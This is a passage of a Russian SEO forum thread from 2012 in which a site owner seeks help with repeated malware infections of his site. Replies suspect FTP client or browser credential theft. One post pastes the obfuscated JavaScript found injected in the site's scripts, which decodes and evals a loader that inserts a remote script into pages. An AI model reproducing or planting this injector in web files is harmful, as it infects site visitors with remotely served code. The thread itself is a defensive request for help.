Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
выдача ТОП 2Полезны

 
Опции темы Оценить тему Опции просмотра
Старый 04.04.2012, 17:35   #31
 
Аватар для Phoenix
 
Сообщений: 1,021
FR (активность): 39,032

Доп. информация
По умолчанию

Globatel, мы сами админы! Хостеру я писал ответ был прост аудитом безопасности мы не занимаемся

Да кстати падаван а ты через браузер в панель заходил?


В сео денег нет, совсем нет
Phoenix вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 04.04.2012, 17:50   #32
 
Аватар для Globatel
 
Сообщений: 20
FR (активность): 878

Доп. информация
Сообщение

Цитата:
Сообщение от xxxPHOENIXxxx Посмотреть сообщение
Globatel, мы сами админы! Хостеру я писал ответ был прост [I]аудитом безопасности мы не занимаемся
Прошу прощения, не подумал, что тут же тоже админы.
Ну тогда админов хостера нужно прикормить, чтобы засуетились)


ЦОД ООО "Глобальные Телекоммуникации".
Скидки на VPS - 50%, на хостинг - 30% до 30.04.2012 г.
Globatel вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 04.04.2012, 21:29   #33
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от xxxPHOENIXxxx Посмотреть сообщение
у тебя аддобе ридер стоит? Какая версия? и стоит ли в браузере прямое открытие файлов пдф через него?
Adobe Reader X 10.1.2. угу, сразу открывает..
Цитата:
Сообщение от xxxPHOENIXxxx Посмотреть сообщение
Да кстати падаван а ты через браузер в панель заходил?
сейчас, чтобы phpinfo закинуть, да. чз файлзиллу лишний раз теперь лезть не охото))


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 05.04.2012, 08:53   #34
 
Аватар для Phoenix
 
Сообщений: 1,021
FR (активность): 39,032

Доп. информация
По умолчанию

Ну вот походу наша беда. Я думаю беда в браузере а не файлзилле. удали все пароли из сохранок.


В сео денег нет, совсем нет
Phoenix вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 05.04.2012, 09:55   #35
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от xxxPHOENIXxxx Посмотреть сообщение
Ну вот походу наша беда. Я думаю беда в браузере а не файлзилле. удали все пароли из сохранок.
откуда такой вывод? и какая связь с Adobe Readerом? ведь все время на фтп я заходил чз файлзиллу а не браузер..


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 05.04.2012, 11:52   #36
 
Аватар для specialist-seo
 
Сообщений: 2,413
FR (активность): 62,830

Доп. информация
По умолчанию

падаван, предполагается, что взломщики не через ftp зашли, а через панель управления на вебсайте
specialist-seo вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
падаван (05.04.2012)
Старый 05.04.2012, 14:48   #37
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от specialist-seo Посмотреть сообщение
предполагается, что взломщики не через ftp зашли, а через панель управления на вебсайте
а, но пароли я в браузере не храню, и до заражения чз панель на фтп никогда не заходил, только вчера, до этого исключительно чз файлзиллу


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 05.04.2012, 16:17   #38
 
Аватар для Phoenix
 
Сообщений: 1,021
FR (активность): 39,032

Доп. информация
По умолчанию

падаван, ну лично по моей ситуации я думаю что у меня хак через браузер был, в этом особо не разбираюсь, но слышал что можно использовать кеш для этого


В сео денег нет, совсем нет
Phoenix вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 05.04.2012, 18:28   #39
 
Аватар для demiurge
 
Сообщений: 10
FR (активность): 204

Доп. информация
По умолчанию

xxxPHOENIXxxx, мельком прочитал ветку, как я понял ты считаешь что заражение вручную было? Мне кажется наврядли, как-то это автоматом делается.
demiurge вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.04.2012, 09:11   #40
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

вот, позавчера специально для эксперимента, снова закинул тестовый сайт на бесплатный хостинг чз ФайлЗиллу, и сейчас он опять заражен! а тот, на который закидывал infophp через браузер, панель хостера, чистый. ну и что теперь, можно смело говорить что проблема с ФайлЗиллой??

ps
в этот раз уже пользовался версией с оф.сайта


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.04.2012, 09:13   #41
 
Аватар для Phoenix
 
Сообщений: 1,021
FR (активность): 39,032

Доп. информация
По умолчанию

скорее всего да. смени клиент и проверь


В сео денег нет, совсем нет
Phoenix вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.04.2012, 09:18   #42
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от xxxPHOENIXxxx Посмотреть сообщение
скорее всего да. смени клиент и проверь
угу. а у тебя что, все чисто сейчас?


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.04.2012, 09:21   #43
 
Аватар для Phoenix
 
Сообщений: 1,021
FR (активность): 39,032

Доп. информация
По умолчанию

падаван, да пока все ок. Кстати поставь фаервол и посмотри с какими айпишками у тебя файлзилла конектится, возможно увидишь куда утекает инфа


В сео денег нет, совсем нет
Phoenix вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
падаван (07.04.2012)
Старый 07.04.2012, 09:26   #44
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

вот еще как, теперь kis сам инфицированный файл скрипта за зараженный не принимает, а код заразы изменился!
Оффтоп:

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")= ==83)try{Date().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i12i62i64i62i61i6i58i75i72i59i 66i65i67i67i72i64i6i60i81i70i60i70i75i5i64i71i69i6 1i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i 69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i6 1i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i6 8i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i 57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i7 6i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i1 1i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i 0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;693!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);

теперь kis паникует только тогда, когда сайт загружается, а если проверять файлы отдельно, то заразу не определяет


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 07.04.2012, 09:41   #45
 
Аватар для падаван
 
Сообщений: 814
FR (активность): 25,662

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от xxxPHOENIXxxx Посмотреть сообщение
Кстати поставь фаервол и посмотри с какими айпишками у тебя файлзилла конектится, возможно увидишь куда утекает инфа
вот то что вижу в kis
Миниатюры
Помогите, сайт заражен!-kis.jpg  


ученик SeoCafe
падаван вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Ответ

Метки
.js, вредоносный код, заражение сайта, скрипты, троян

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 3289 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите оценить сайт Tenza Оценка сайтов 8 12.01.2012 19:36
Помогите раскрутить сайт narmina SEO оптимизация (анализ) 0 11.03.2011 15:58
Помогите оценить сайт SE-O Оценка сайтов 4 01.12.2010 00:51
Помогите продвинуть сайт Staral Раскрутка в общих чертах 4 02.10.2009 18:36
Помогите! сайт рухнул vamgazel Яndex 10 11.07.2009 09:31

Текущее время: 12:02. Часовой пояс GMT +3.